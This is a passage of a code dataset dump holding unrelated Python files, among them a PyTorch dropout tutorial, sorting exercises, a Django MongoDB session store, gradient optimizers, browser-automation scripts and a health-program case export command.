name=\"addMate\"),\n\n]\n","sub_path":"userPanel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"132004847","text":"# -*- encoding: utf-8 -*-\n\nimport torch\nimport numpy as np\nimport sys\nsys.path.append('../..')\nimport dl_common_pytorch as dl\nimport torch.nn as nn\n\n'''\n除了权重衰减可以处理过拟合问题,在深度学习模型还经常使用丢弃法(dropout)应对过拟合问题。\n丢弃法有一些不同的变体,下面以倒置丢弃法(inverted dropout)为例。\n\n多层感知机:含有一个单隐藏层的多层感知机,其中数人个数为4,隐藏单元个数为5,且隐藏单元hi(i=1~5)的计算表达式:\nhi = Q(x1w1i + x2w2i + x3w3i + x4w4i + bi)\n其中Q为激活函数,x1x2x3x4是输入,隐藏单元i的权重参数为w1i,w2i,w3i,w4i(第i个隐藏单元权重参数,一个有5个隐藏单元),偏差参数为bi。\n当对该隐藏层使用丢弃法时,该层的隐藏单元将有一定概率被丢弃掉。设丢弃概率wiep,那么有p的概率hi会被清零,有1-p的概率hi会除以1-p做拉伸。\n丢弃概率是丢弃法的超参数。具体来说,设随机变量ei为0和1的概率分别为p和1-p,使用丢弃法时我们计算新的隐藏单元h'i:\nh'i = (ei / (1-p)) * hi\n由于E(ei) = 1 - p,因此:\nE(h'i) = (E(ei) / (1-p)) * hi = hi,即丢弃法不改变其输入的期望值\n'''\ndef dropout(X, drop_prob):\n X = X.float()\n assert 0 <= drop_prob <= 1\n keep_prob = 1 - drop_prob\n # 这种情况下把全部元素都抛弃\n if keep_prob == 0:\n return torch.zeros_like(X)\n # 随机一个与X一致矩阵,对比里面的每个元素是否小于keep_prob,然后将符合条件的使用.float()转换为1\n mask = (torch.randn(X.shape) < keep_prob).float()\n # 将mask与X相乘,就会去掉一些隐藏的单元,剩下的元素再除以keep_prob\n return mask * X / keep_prob\n\n# 丢弃概率分别为0、0.5和1\nX = torch.arange(16).view(2, 8)\nprint(dropout(X, 0))\nprint(dropout(X, 0.5))\nprint(dropout(X, 1.0))\n\n# 定义一个包含两个隐藏层的多层感知机,其中两个隐藏层的输出个数都是256\nnum_inputs, num_outputs, num_hiddens1, num_hiddens2 = 784, 10, 256, 256\n\nW1 = torch.tensor(np.random.normal(0, 0.01, size=(num_inputs, num_hiddens1)), dtype=torch.float, requires_grad=True)\nb1 = torch.zeros(num_hiddens1, requires_grad=True)\nW2 = torch.tensor(np.random.normal(0, 0.01, size=(num_hiddens1, num_hiddens2)), dtype=torch.float, requires_grad=True)\nb2 = torch.zeros(num_hiddens2, requires_grad=True)\nW3 = torch.tensor(np.random.normal(0, 0.01, size=(num_hiddens2, num_outputs)), dtype=torch.float, requires_grad=True)\nb3 = torch.zeros(num_outputs, requires_grad=True)\nparams = [W1, b1, W2, b2, W3, b3]\n\n# 定义模型将全连接层和激活函数ReLU串起来,并对每个激活函数的输出使用丢弃法。\n# 可以分别设置各个层的丢弃概率。通常的建议是把靠近输入层的丢弃概率设置得小一点。\n# 在此实验中,我们将第一个隐藏层的丢弃概率设置为0.2,第二个隐藏层的丢弃概率设为0.5。\n# 通过参数is_training函数来判断运行模式为训练还是测试,并只需在训练模型下使用丢弃法。\ndrop_prob1, drop_prob2 = 0.2, 0.5\n\ndef net(X, is_training=True):\n X = X.view(-1, num_inputs)\n # 第一隐藏层函数其实就是将原函数通过激活relu函数输出到第二层隐藏层\n H1 = (torch.matmul(X, W1) + b1).relu()\n if is_training: # 只在训练模型时使用丢弃法\n H1 = dropout(H1, drop_prob1) # 在第一层全连接后添加丢弃层\n H2 = (torch.matmul(H1, W2) + b2).relu()\n if is_training: # 只在训练模型时使用丢弃法\n H1 = dropout(H2, drop_prob2) # 在第二层全连接后添加丢弃层\n return torch.matmul(H2, W3) + b3\n\n# 在模型评估时,不应该进行丢弃\nnum_epochs, lr, batch_size = 5, 100.0, 256\nloss = torch.nn.CrossEntropyLoss()\ntrain_iter, test_iter = dl.load_data_fashion_mnist(batch_size)\ndl.train_ch3(net, train_iter, test_iter, loss, num_epochs, batch_size, params, lr)\n'''\n��1次正在训练.\nepoch 1, loss 0.0047, train acc 0.534, test acc 0.724\n第2次正在训练.\nepoch 2, loss 0.0023, train acc 0.784, test acc 0.769\n第3次正在训练.\nepoch 3, loss 0.0019, train acc 0.825, test acc 0.829\n第4次正在训练.\nepoch 4, loss 0.0017, train acc 0.840, test acc 0.825\n第5次正在训练.\nepoch 5, loss 0.0016, train acc 0.849, test acc 0.833\n'''\n\n# PyTorch的简洁实现,只需要在全连接层后添加Dropout层并指定丢弃概率\n# 在训练模型时,Dropout层将以指定的丢弃概率随机丢弃上一层的输出元素;在测试模型时(即model.eval()后),Dropout层并不发挥作用。\nnet = nn.Sequential(\n dl.FlattenLayer(),\n nn.Linear(num_inputs, num_hiddens1),\n nn.ReLU(),\n nn.Dropout(drop_prob1),\n nn.Linear(num_hiddens1, num_hiddens2),\n nn.ReLU(),\n nn.Dropout(drop_prob2),\n nn.Linear(num_hiddens2, num_outputs)\n)\n\nfor param in net.parameters():\n nn.init.normal_(param, mean=0, std=0.01)\n \n# 训练并测试模型\noptimizer = torch.optim.SGD(net.parameters(), 
lr=0.5)\ndl.train_ch3(net, train_iter, test_iter, loss, num_epochs, batch_size, None, None, optimizer)\n'''\n第1次正在训练.\nepoch 1, loss 0.0044, train acc 0.557, test acc 0.763\n第2次正在训练.\nepoch 2, loss 0.0022, train acc 0.787, test acc 0.819\n第3次正在训练.\nepoch 3, loss 0.0019, train acc 0.820, test acc 0.743\n第4次正在训练.\nepoch 4, loss 0.0018, train acc 0.837, test acc 0.834\n第5次正在训练.\nepoch 5, loss 0.0016, train acc 0.848, test acc 0.828\n'''","sub_path":"04.动手深度学习-Pytorch/03.线性回归/codes/10.overfitting_dropout丢弃法处理过拟合问题 - 副本.py","file_name":"10.overfitting_dropout丢弃法处理过拟合问题 - 副本.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"40084401","text":"\"\"\"\nSelection Sort\nGiven an array of integers, sort the elements in the array in ascending order. The selection sort algorithm should be used to solve this problem.\n\nExamples\n\n{1} is sorted to {1}\n{1, 2, 3} is sorted to {1, 2, 3}\n{3, 2, 1} is sorted to {1, 2, 3}\n{4, 2, -3, 6, 1} is sorted to {-3, 1, 2, 4, 6}\nCorner Cases\n\nWhat if the given array is null? In this case, we do not need to do anything.\nWhat if the given array is of length zero? In this case, we do not need to do anything.\n\"\"\"\n\nclass Solution(object):\n def solve(self, array):\n \"\"\"\n array: int[]\n return: int[]\n \"\"\"\n # write your solution here\n # check for None or 0-length case\n if not array:\n return [] # ===> should return [] instead of None\n # loop over 0 - (n - 1)\n for i in range(len(array)-1):\n # find the min value and its index for the remaining elements\n min_idx = i\n for j in range(i+1, len(array)):\n if array[j] < array[min_idx]:\n min_idx = j\n # swap\n array[i], array[min_idx] = array[min_idx], array[i]\n return array","sub_path":"lo/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"161925724","text":"from flask import Blueprint, url_for, abort\nfrom functools import wraps\nimport threading\nfrom collections import OrderedDict\nfrom flask.ext.login import current_user, login_required\n\n\nclass MenuBlueprint(Blueprint):\n def __init__(self, *args, **kwargs):\n super(MenuBlueprint, self).__init__(*args, **kwargs)\n self.full_menu = OrderedDict()\n self.tabs = OrderedDict()\n self.tlocal = threading.local()\n self.permissions = {}\n self.context_processor(self._menu_context_processor)\n\n def menu(self, tab, pill, link=True, icon=None):\n def outer_decorator(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n self.tlocal.active = tab\n self.tlocal.pill = pill\n rv = f(*args, **kwargs)\n self.tlocal.active = None\n self.tlocal.pill = None\n return rv\n if link:\n menu1 = self.full_menu.setdefault(tab, OrderedDict())\n if pill is not None:\n menu1[pill] = (f.__name__, icon if pill != 'index' else None)\n if pill == 'index' or pill is None:\n self.tabs[tab] = (f.__name__, icon)\n return decorated_function\n return outer_decorator\n\n def permission_required(self, *kinds):\n def outer_decorator(f):\n @login_required\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if not current_user.has_permissions(set(kinds)):\n abort(403)\n return f(*args, **kwargs)\n self.permissions[f.__name__] = set(kinds)\n return decorated_function\n return outer_decorator\n\n def _menu_context_processor(self):\n active = getattr(self.tlocal, 'active', None)\n if active is None:\n return {}\n\n return dict(\n active=active,\n active_pill=self.tlocal.pill,\n tabs=[(k, url_for(self.name+'.'+v[0]), v[1])\n for k, v in self.tabs.items()\n if current_user.has_permissions(self.permissions[v[0]])],\n pills=[(k, url_for(self.name+'.'+v[0]), v[1])\n for k, v in self.full_menu[active].items()\n if current_user.has_permissions(self.permissions[v[0]])])\n","sub_path":"surfmanage/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"557563151","text":"from django.contrib.sessions.backends.base import SessionBase, CreateError\nfrom django.core.exceptions import SuspiciousOperation\nfrom django.utils.encoding import force_unicode\n\nfrom sentieolib.mongoengine.document import Document\nfrom sentieolib.mongoengine import fields\nfrom sentieolib.mongoengine.queryset import OperationError\n\nfrom datetime import datetime\nimport json\nimport httpagentparser\n\n\nclass MongoSession(Document):\n session_key = fields.StringField(primary_key=True, max_length=40)\n session_data = fields.StringField()\n expire_date = fields.DateTimeField()\n user_id = fields.StringField()\n user_agent = fields.StringField()\n device_id = fields.StringField()\n \n meta = {'collection': 'django_session', 'allow_inheritance': False}\n\n def embed(self):\n user_id = self.user_id if self.user_id else ''\n device_id = self.device_id if self.device_id else ''\n user_agent = ''\n if self.user_agent:\n value = json.loads(self.user_agent).get('ua')\n if value:\n dict = httpagentparser.detect(value)\n try:\n browser = dict['browser']['name'] + ' ' +dict.get('browser',{}).get('version','')\n os = dict['os']['name']+' '+dict.get('os',{}).get('version','')\n user_agent = 'Browser : '+browser+', OS : '+os\n\n except :\n # return value\n user_agent = ''\n else:\n user_agent = ''\n else:\n user_agent = ''\n\n return {'session_key':self.session_key,\n 'user_id':user_id,\n 'device_id':device_id,\n 'user_agent':user_agent}\n\n\nclass SessionStore(SessionBase):\n \"\"\"A MongoEngine-based session store for Django.\n \"\"\"\n\n def load(self):\n try:\n s = MongoSession.objects(session_key=self.session_key,\n expire_date__gt=datetime.now())[0]\n return self.decode(force_unicode(s.session_data))\n except (IndexError, SuspiciousOperation):\n self.create()\n return {}\n\n def exists(self, session_key):\n return bool(MongoSession.objects(session_key=session_key).first())\n\n def create(self):\n while True:\n self.session_key = self._get_new_session_key()\n try:\n self.save(must_create=True)\n except CreateError:\n continue\n self.modified = True\n self._session_cache = {}\n return\n\n def save(self, must_create=False):\n s = MongoSession(session_key=self.session_key)\n data = self._get_session(no_load=must_create)\n s.session_data = self.encode(data)\n s.expire_date = self.get_expiry_date()\n s.user_id = data.get('_user_id','')\n s.device_id = data.get('_dev_id','')\n s.user_agent = data.get('_user_agent','')\n try:\n s.save(force_insert=must_create, safe=True)\n except OperationError:\n if must_create:\n raise CreateError\n raise\n\n def delete(self, session_key=None):\n if session_key is None:\n if self.session_key is None:\n return\n session_key = self.session_key\n MongoSession.objects(session_key=session_key).delete()\n\n def set_user_id(self,userid):\n try:\n s = MongoSession.objects(session_key=self.session_key,\n expire_date__gt=datetime.now())[0]\n\n s.user_id = userid\n\n s.save()\n return 'uid Success '+userid+' '+self.session_key+' '\n except (IndexError, SuspiciousOperation):\n import traceback\n return 'set_user_id \\n\\n'+traceback.format_exc()\n\n def get_user_id(self):\n try:\n s = MongoSession.objects(session_key=self.session_key,\n expire_date__gt=datetime.now())[0]\n\n return s.user_id\n except (IndexError, SuspiciousOperation):\n return ''\n\n def set_user_agent(self,useragent):\n try:\n s = MongoSession.objects(session_key=self.session_key,\n expire_date__gt=datetime.now())[0]\n\n if type(useragent) == type({}):\n useragent = 
json.dumps(useragent)\n            s.user_agent = useragent\n\n            s.save()\n            return 'ua Success '+useragent\n        except (IndexError, SuspiciousOperation):\n            import traceback\n            return 'set_user_agent \\n\\n'+traceback.format_exc()\n\n    def get_user_agent(self):\n        try:\n            s = MongoSession.objects(session_key=self.session_key,\n                                     expire_date__gt=datetime.now())[0]\n\n            if s.user_agent:\n                return json.loads(s.user_agent)\n            else:\n                return {}\n        except (IndexError, SuspiciousOperation):\n            return {}\n\n    def set_device_id(self,deviceid):\n        try:\n            s = MongoSession.objects(session_key=self.session_key,\n                                     expire_date__gt=datetime.now())[0]\n\n            s.device_id = deviceid\n            s.save()\n            return 'di Success '+deviceid\n        except (IndexError, SuspiciousOperation):\n            import traceback\n            return 'set_di \\n\\n'+traceback.format_exc()\n\n    def get_device_id(self):\n        try:\n            s = MongoSession.objects(session_key=self.session_key,\n                                     expire_date__gt=datetime.now())[0]\n\n            return s.device_id  # fixed: the model field is device_id, not device\n        except (IndexError, SuspiciousOperation):\n            pass\n\n\n    def get_session_id(self):\n        return self.session_key\n    # def __contains__(self, key):\n    #     return key in self._session\n    #\n    # def __getitem__(self, key):\n    #     return self._session[key]\n    #\n    # def __setitem__(self, key, value):\n    #     self._session[key] = value\n    #     self.modified = True\n    #\n    # def __delitem__(self, key):\n    #     del self._session[key]\n    #     self.modified = True\n\n\n\n\n\n\n\n\n","sub_path":"mysite/mongoengine/django/sessions.py","file_name":"sessions.py","file_ext":"py","file_size_in_byte":6160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"189654034","text":"'''\nNumber sorting program\nCreated Spring 2019\nLab03\n@author: Ethan Walters (emw45)\n'''\n\n\n# Get numbers from user input\nnum1 = int(input('Please enter number 1: '))\nnum2 = int(input('Please enter number 2: '))\nnum3 = int(input('Please enter number 3: '))\nnum4 = int(input('Please enter number 4: '))\n\n# Create the lists\nnum_list = []\nnum_list2 = []\n\n# Append the numbers to the first list\nnum_list.append(num1)\nnum_list.append(num2)\nnum_list.append(num3)\nnum_list.append(num4)\n\n# Add the min number from list1 into list2, then remove the min number from list1 so that min number is only in list2.\n# Repeat this process until all numbers are sorted in order.\nnum_list2.append(min(num_list))\nnum_list.remove(min(num_list))\nnum_list2.append(min(num_list))\nnum_list.remove(min(num_list))\nnum_list2.append(min(num_list))\nnum_list.remove(min(num_list))\nnum_list2.append(min(num_list))\nnum_list.remove(min(num_list))\n\n# Print the second number list to display results\nprint(num_list2)","sub_path":"lab03/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"480903863","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport shift_spectra\nimport specmatch_io\n\ndef run_script(lib_restr, ref_path):\n for index, row in lib_restr.iterrows():\n spec_path = '/Users/samuel/Dropbox/SpecMatch-Emp/spectra/iodfitsdb/'+row['obs']+'.fits'\n out_path = '../lib/'+row['obs']+'_adj.fits'\n img_path = '../lib/Images/'+str(row['Teff'])+'_'+row['obs']+'.png'\n img_lags_path = '../lib/Images/'+str(row['Teff'])+'_'+row['obs']+'_lags.png'\n try:\n s, w, serr = shift_spectra.main(spec_path, 'hires', ref_path, out_path, \n diagnostic=True, diagnosticfile=img_lags_path)\n except Exception as e:\n print(e)\n continue\n\n plt.clf()\n plt.plot(w_nso, s_nso)\n plt.plot(w, s)\n plt.xlim(5480, 5490)\n plt.savefig(img_path)\n\nlib = pd.read_csv('../starswithspectra.csv',index_col=0)\nlib = lib.convert_objects(convert_numeric=True)\n\nnso_path = '/Users/samuel/Dropbox/SpecMatch-Emp/nso/nso_std.fits'\ns_nso, w_nso, serr_nso, h_nso = specmatch_io.read_standard_spectrum(nso_path)\n\n# lib_restr = lib.query('5540 < Teff < 5550')\n# ref_path = nso_path\n# run_script(lib_restr, ref_path)\n\n# 4500 < Teff < 6500\nlib_restr = lib.query('4500 < Teff < 6500')\nref_path = nso_path\nrun_script(lib_restr, ref_path)\n\n# 3700 < Teff < 4500\nlib_restr = lib.query('3700 < Teff <= 4500')\nref_path = '../lib/rj55.906_adj.fits'\nrun_script(lib_restr, ref_path)\n\n# Teff <= 3700\nlib_restr = lib.query('Teff <= 3700')\nref_path = '../lib/rj59.1926_adj.fits'\nrun_script(lib_restr, ref_path)\n\n# Teff >= 6500\nlib_restr = lib.query('Teff >= 6300')\nref_path = '../lib/rj187.479_adj.fits'\nrun_script(lib_restr, ref_path)","sub_path":"specmatchemp/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"49641883","text":"import pyautogui as pag\r\nimport time\r\nimport webbrowser\r\nimport os\r\nimport re\r\nimport os\r\ntime.sleep(2)\r\n##CHECK BEFORE YOU RUN\r\ndef open_youtube(its):\r\n Get_Ticker()\r\n url = \"https://studio.youtube.com/channel/UC2KSj189drlAWDWYiI8E2GA/videos/upload?d=ud&filter=%5B%5D&sort=%7B%22columnType%22%3A%22date%22%2C%22sortOrder%22%3A%22DESCENDING%22%7D\"\r\n for i in range(its):\r\n webbrowser.open_new_tab(url)\r\n\r\n\r\n#Sort of obsolete now\r\ndef loadYouTube(its):\r\n time.sleep(2)\r\n pag.keyDown('ctrl')\r\n for i in range(its):\r\n pag.click(x=1767, y=110)\r\n time.sleep(.1)\r\n pag.click(x=1767, y=147)\r\n time.sleep(.2)\r\n\r\n\r\ndef nextTab(its):\r\n for i in range(its):\r\n pag.click(x=1359, y=974)\r\n time.sleep(.1)\r\n pag.click(x=1359, y=974)\r\n time.sleep(.1)\r\n pag.hotkey('ctrl', 'tab')\r\n time.sleep(.2)\r\n\r\n\r\ndef schedule(its):\r\n for i in range(its):\r\n (624, 496)\r\n pag.click(x=625, y=500)\r\n #time.sleep(.1)\r\n #pag.click(x=601, y=389)\r\n time.sleep(.1)\r\n pag.hotkey('ctrl', 'tab')\r\n time.sleep(.2)\r\n\r\ndef publish(its):\r\n for i in range(its):\r\n pag.click(x=1338, y=974)\r\n time.sleep(5)\r\n\r\n pag.hotkey('ctrl', 'tab')\r\n time.sleep(.1)\r\ndef Get_Ticker():\r\n path, dirs, files = next(os.walk(\"C:/Users/Scott/Documents/Python Things/Earnings Calls/Todays Videos\"))\r\n for file in files:\r\n s = file\r\n m = re.search(r\"\\(([A-Za-z0-9_]+)\\)\", s)\r\n try:\r\n print(m.group(1))\r\n except:\r\n print(m)\r\n\r\npath, dirs, files = next(os.walk(\"C:/Users/Scott/Documents/Python Things/Earnings Calls/Todays Videos\"))\r\nits=len(files)\r\n#open_youtube(its)\r\nnextTab(its)\r\nschedule(its)\r\n#\r\npublish(its)\r\n\r\n#Andrew Adiberry\r\n#503 681 5405\r\n\r\n","sub_path":"Earnings Calls/next.py","file_name":"next.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"15103179","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport selenium.webdriver.support.ui as ui\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import TimeoutException, NoSuchElementException\nfrom common.exceptions import SiteErrorException\n\n\nclass Downloader(object):\n def __init__(self, url, driver='assets/chromedriver.exe'):\n self.chrome_driver_path = driver\n self.site_url = url\n self.ext_sht = Keys.CONTROL + \"m\"\n chop = webdriver.ChromeOptions()\n chop.add_extension('assets/Flash-Video-Downloader_v29.1.0.crx')\n self.driver = webdriver.Chrome(executable_path=self.chrome_driver_path, chrome_options=chop)\n self.wait = ui.WebDriverWait(self.driver, 10)\n self.counterWait = ui.WebDriverWait(self.driver, 35)\n # self.set_extension_shortcut()\n\n def set_extension_shortcut(self):\n self.driver.get('chrome://extensions-frame/')\n self.driver.find_element(By.XPATH, \"//a[@class='extension-commands-config']\").click()\n self.driver.find_element(By.XPATH, \"//span[@class='command-shortcut-text']\").send_keys(self.ext_sht)\n self.driver.find_element(By.ID, \"extension-commands-dismiss\").click()\n\n def connect(self):\n self.driver.get(self.site_url)\n\n def perform_search(self, search_text):\n search = self.driver.find_element(By.XPATH, \"//input[@name='term'][@type='text']\")\n search.send_keys(search_text)\n search = self.driver.find_element(By.XPATH, \"//form[@id='mainSearch']/div/span/button\")\n search.click()\n\n def select_season(self, season_num):\n season_link = self.driver.find_element(By.XPATH, \"//li[@data-season='{}']\".format(season_num))\n season_link.click()\n\n def select_episode(self, episode_num):\n episode_link = self.counterWait.until(lambda driver: driver.find_element(By.XPATH,\n \"//ul[@id='episode']/li[@data-episode='{}']\".format(\n episode_num)))\n episode_link = self.driver.find_element(By.XPATH,\n \"//ul[@id='episode']/li[@data-episode='{}']\".format(episode_num))\n episode_link.click()\n\n timer = self.wait.until(lambda driver: driver.find_element(By.XPATH, \"//p[@id='waitTime']\"))\n timer.location_once_scrolled_into_view\n # footer = self.driver.find_element_by_tag_name('footer')\n # footer.location_once_scrolled_into_view\n # actions = ActionChains(self.driver)\n # actions.move_to_element(footer)\n # p id =waitTime\n\n def activate_extension(self):\n self.driver.find_element(By.TAG_NAME, \"body\").send_keys(self.ext_sht)\n\n def download_using_flash(self):\n try:\n p_button = self.counterWait.until(lambda driver: driver.find_element(By.XPATH,\n \"//button[@id='proceed']\"))\n try:\n error = self.counterWait.until(lambda driver: driver.find_element(By.XPATH,\n \"//div[@class='err']\"))\n if 'שגיאה' in error.text:\n raise SiteErrorException\n except NoSuchElementException as e:\n print(\"no such element {}\".format(e.msg))\n # EC.\n # self.wait.\n self.activate_extension()\n\n except TimeoutException as e:\n print(\"timeout exception\")\n error = self.driver.find_element(By.XPATH, \"//div[@class='err']\")\n if error:\n raise SiteErrorException()\n except SiteErrorException as e:\n raise e\n\n def refresh(self):\n self.driver.refresh()\n\n def close(self):\n self.driver.close()\n\n def switch_tabs(self):\n self.driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + Keys.TAB)\n\n def open_new_tab(self, url):\n self.driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + 't')\n self.driver.get(url)\n\n def close_current_tab(self):\n 
self.driver.find_element_by_tag_name('html').send_keys(Keys.CONTROL + 'w')\n","sub_path":"download/Downloader.py","file_name":"Downloader.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"77014154","text":"import cupy as np\n\n\ndef set_optimizer(opt, lr):\n if opt == \"SGD\":\n return SGD(lr = lr)\n if opt == \"Adam\":\n return Adam(lr = lr)\n if opt == \"AdaBound\":\n return AdaBound(lr = lr, final_lr = 0.1)\n else:\n print(\"{} is not defined.\".format(opt))\n return None\n \n\nclass SGD:\n def __init__(self, lr = 0.1):\n self.lr = lr\n\n def update(self, params, grads):\n for key in params.keys():\n params[key] -= self.lr * grads[key]\n\n\nclass Adam:\n def __init__(self, lr):\n self.lr = lr\n self.beta1 = 0.9\n self.beta2 = 0.999\n self.iters = 0\n self.m = None\n self.v = None\n self.eps = 1e-7\n\n def update(self, params, grads):\n if self.m is None and self.v is None:\n self.m = {}\n self.v = {}\n for key, val in params.items():\n self.m[key] = np.zeros_like(val)\n self.v[key] = np.zeros_like(val)\n self.iters += 1\n lr_t = self.lr * np.sqrt(1.0 - self.beta2**self.iters) / (1.0 - self.beta1**self.iters)\n for key in params.keys():\n self.m[key] += (1.0 - self.beta1) * (grads[key] - self.m[key])\n self.v[key] += (1.0 - self.beta2) * (grads[key]**2 - self.v[key])\n params[key] -= lr_t * self.m[key] / (np.sqrt(self.v[key]) + self.eps)\n\n\nclass AdaBound:\n def __init__(self, lr, final_lr):\n self.lr = lr\n self.final_lr = final_lr\n self.beta1 = 0.9\n self.beta2 = 0.999\n self.iters = 0\n self.m = None\n self.v = None\n self.eps = 1e-7\n\n def update(self, params, grads):\n if self.m is None and self.v is None:\n self.m = {}\n self.v = {}\n for key, val in params.items():\n self.m[key] = np.zeros_like(val)\n self.v[key] = np.zeros_like(val)\n self.iters += 1\n lower_lr = self.final_lr * (1.0 - 1.0 / ((1.0-self.beta2) * self.iters + 1.0))\n higher_lr = self.final_lr * (1.0 + 1.0 / ((1.0-self.beta2) * self.iters))\n for key in params.keys():\n self.m[key] += (1.0 - self.beta1) * (grads[key] - self.m[key])\n self.v[key] += (1.0 - self.beta2) * (grads[key]**2 - self.v[key])\n lr_t = np.clip(self.lr / (np.sqrt(self.v[key]) + self.eps), lower_lr, higher_lr) / np.sqrt(self.iters)\n params[key] -= lr_t * self.m[key]\n","sub_path":"optimizer_gpu.py","file_name":"optimizer_gpu.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"491699478","text":"from __future__ import (\n absolute_import,\n print_function,\n)\n\nfrom __future__ import unicode_literals\nimport os\nfrom corehq.form_processor.interfaces.dbaccessors import CaseAccessors\nfrom corehq.apps.es.case_search import CaseSearchES\nfrom corehq.apps.es import queries\n\nfrom custom.enikshay.case_utils import (\n CASE_TYPE_EPISODE,\n CASE_TYPE_PERSON,\n get_all_occurrence_cases_from_person,\n)\nfrom custom.enikshay.const import ENROLLED_IN_PRIVATE\nfrom custom.enikshay.management.commands.base_data_dump import BaseDataDump\nfrom corehq.elastic import ES_EXPORT_INSTANCE\n\nDOMAIN = \"enikshay\"\n\n\nclass Command(BaseDataDump):\n \"\"\" data dumps for person cases\n\n https://docs.google.com/spreadsheets/d/1OPp0oFlizDnIyrn7Eiv11vUp8IBmc73hES7qqT-mKKA/edit#gid=1039030624\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(Command, self).__init__(*args, **kwargs)\n self.case_type = CASE_TYPE_PERSON\n self.input_file_name = os.path.join(os.path.dirname(__file__),\n 'data_dumps_person_case.csv')\n\n TASK_NAME = \"data_dumps_person_case\"\n INPUT_FILE_NAME = ('%s/data_dumps_person_case.csv' %\n os.path.dirname(os.path.realpath(__file__)))\n\n def get_last_episode(self, case):\n self.context['last_episode'] = (\n self.context.get('last_episode') or\n get_last_episode(case)\n )\n if not self.context['last_episode']:\n return Exception(\"could not find last episode for person %s\" % case.case_id)\n return self.context['last_episode']\n\n def get_custom_value(self, column_name, case):\n if column_name == 'Status':\n if case.closed:\n return \"closed\"\n elif case.owner_id == \"_invalid_\":\n return \"removed\"\n elif case.owner_id == '_archive_':\n return \"archived\"\n else:\n return \"active\"\n return Exception(\"unknown custom column %s\" % column_name)\n\n def get_case_reference_value(self, case_reference, case, calculation):\n if case_reference == 'last_episode':\n try:\n return self.get_last_episode(case).get_case_property(calculation)\n except Exception as e:\n return str(e)\n return Exception(\"unknown case reference %s\" % case_reference)\n\n def get_case_ids(self, case_type):\n \"\"\"\n All open and closed person cases with person.dataset = 'real' and person.enrolled_in_private != 'true'\n \"\"\"\n return (CaseSearchES(es_instance_alias=ES_EXPORT_INSTANCE)\n .domain(DOMAIN)\n .case_type(case_type)\n .case_property_query(ENROLLED_IN_PRIVATE, 'true', clause=queries.MUST_NOT)\n .case_property_query(\"dataset\", 'real')\n .get_ids()[0:10])\n\n\ndef get_recently_closed_case(person_case, all_cases):\n recently_closed_case = None\n recently_closed_time = None\n for case in all_cases:\n case_closed_time = case.closed_on\n if case_closed_time:\n if recently_closed_time is None:\n recently_closed_time = case_closed_time\n recently_closed_case = case\n elif recently_closed_time and recently_closed_time < case_closed_time:\n recently_closed_time = case_closed_time\n recently_closed_case = case\n elif recently_closed_time and recently_closed_time == case_closed_time:\n raise Exception(\"This looks like a super edge case that can be looked at. \"\n \"Two episodes closed at the same time. 
Case id: {case_id}\"\n .format(case_id=case.case_id))\n\n if not recently_closed_case:\n return Exception(\"Could not find recently closed episode case for person %s\" %\n person_case.case_id)\n\n return recently_closed_case\n\n\ndef get_all_episode_cases_from_person(domain, person_case_id):\n occurrence_cases = get_all_occurrence_cases_from_person(domain, person_case_id)\n return [\n case for case in CaseAccessors(domain).get_reverse_indexed_cases(\n [c.case_id for c in occurrence_cases], case_types=[CASE_TYPE_EPISODE])\n ]\n\n\ndef get_last_episode(person_case):\n \"\"\"\n For all episode cases under the person (the host of the host of the episode is the primary person case)\n If count(open episode cases with episode.is_active = 'yes') > 1, report error\n If count(open episode cases with episode.is_active = 'yes') = 1, pick this case\n If count(open episode cases with episode.is_active = 'yes') = 0:\n If count(open episode cases) > 0, report error\n Else, pick the episode with the latest episode.closed_date\n \"\"\"\n episode_cases = get_all_episode_cases_from_person(person_case.domain, person_case.case_id)\n open_episode_cases = [\n episode_case for episode_case in episode_cases\n if not episode_case.closed\n ]\n active_open_episode_cases = [\n episode_case for episode_case in open_episode_cases\n if episode_case.get_case_property('is_active') == 'yes'\n ]\n if len(active_open_episode_cases) > 1:\n raise Exception(\"Multiple active open episode cases found for %s\" % person_case.case_id)\n elif len(active_open_episode_cases) == 1:\n return active_open_episode_cases[0]\n elif len(open_episode_cases) > 0:\n raise Exception(\"Open inactive episode cases found for %s\" % person_case.case_id)\n else:\n return get_recently_closed_case(person_case, episode_cases)\n","sub_path":"custom/enikshay/management/commands/data_dumps_person_case.py","file_name":"data_dumps_person_case.py","file_ext":"py","file_size_in_byte":5598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
